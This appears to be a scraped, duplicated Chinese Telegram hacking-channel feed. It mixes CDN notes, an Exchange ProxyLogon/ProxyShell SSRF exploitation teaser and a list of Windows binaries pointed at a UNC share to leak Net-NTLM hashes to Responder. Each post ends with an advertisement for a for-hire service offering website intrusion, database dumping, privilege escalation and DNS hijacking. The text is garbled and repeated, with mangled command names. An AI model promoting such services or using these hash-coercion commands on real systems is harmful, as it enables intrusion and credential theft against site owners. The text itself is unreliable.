6.152.44.95和36.152.44.96,此处说明了百度存在cdn
直接访问ping得到的ip地址36.152.44.95的80和443端口
访问80端口
渗透技术团队,可渗透,可拿后台,可更改服务器,劫持跳转可入侵等等
黑客技术团咨询:@hacker_HouZiM
直接访问ping得到的ip地址36.152.44.95的80和443端口
访问80端口
渗透技术团队,可渗透,可拿后台,可更改服务器,劫持跳转可入侵等等
黑客技术团咨询:@hacker_HouZiM
❤2👍1
This media is not supported in your browser
VIEW IN TELEGRAM
打开主域名马上就跳转到 www 域名了,测试了 https 状态码也是 301。这个打开速度要比 DNSPOD 的显性 URL 快多了,成功率也高多了。而且国人用主域名打开网站毕竟还是少数的。腾讯云 CDN 每个月送你免费的 10G 加速流量,如果网站流量不大也够用了。这就很完美的解决了DNSPOD 主域名设置显性 URL 后无法跳转到 www 域名的问题。
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤2👍1🔥1
<init-param>
<param-name>ignorePattern</param-name>
<param-value>^/api/guest$</param-value>
</init-param>
Exchange EWS接口的利用
最近出来了几个Exchange preauth的漏洞,有Proxylogon、Proxyshell。简单看了下,本质都是SSRF,然后通过SSRF调用一些需要授权的接口进行GetShell。如果不进行GetShell,又或者是GetShell失败时,如何利用上面的SSRF去获取邮件内容等操作,又或者只有NTLM HASH时,无法解密出密码时,如何依然去做同样的Exchange的操作。
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
<param-name>ignorePattern</param-name>
<param-value>^/api/guest$</param-value>
</init-param>
Exchange EWS接口的利用
最近出来了几个Exchange preauth的漏洞,有Proxylogon、Proxyshell。简单看了下,本质都是SSRF,然后通过SSRF调用一些需要授权的接口进行GetShell。如果不进行GetShell,又或者是GetShell失败时,如何利用上面的SSRF去获取邮件内容等操作,又或者只有NTLM HASH时,无法解密出密码时,如何依然去做同样的Exchange的操作。
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤1👍1
我们使用以下命令也可以在responder中获取到Net-NTLMHash值:
netexe use hostshare
attrib.exe hostshare
bcdbootexe hostshare
bdeunlockexe hostshare
cacls.exe hostshare
certreqexe hostshare #noisypops anerror dialog)
certutil.exe hostshare
cipher.exe hostshare
>ClipUp.exe -hostshare
cmdl32.exe hostshare
cmstp.exe /s hostshare
colorcpl.exe hostshare #noisy pops anerror dialog)
comp.exe /N=0 hostshare hostsharecompact.exe hostshare
control.exe hostshare
convertvhd.exe source hostshare
destination hostshare
Defragexe hostshare
S diskperfexe hostshare
dispdiagexe-out lhostshare
正在拿站中 新伙伴拿上你的站点来咨询
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
netexe use hostshare
attrib.exe hostshare
bcdbootexe hostshare
bdeunlockexe hostshare
cacls.exe hostshare
certreqexe hostshare #noisypops anerror dialog)
certutil.exe hostshare
cipher.exe hostshare
>ClipUp.exe -hostshare
cmdl32.exe hostshare
cmstp.exe /s hostshare
colorcpl.exe hostshare #noisy pops anerror dialog)
comp.exe /N=0 hostshare hostsharecompact.exe hostshare
control.exe hostshare
convertvhd.exe source hostshare
destination hostshare
Defragexe hostshare
S diskperfexe hostshare
dispdiagexe-out lhostshare
正在拿站中 新伙伴拿上你的站点来咨询
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
👍1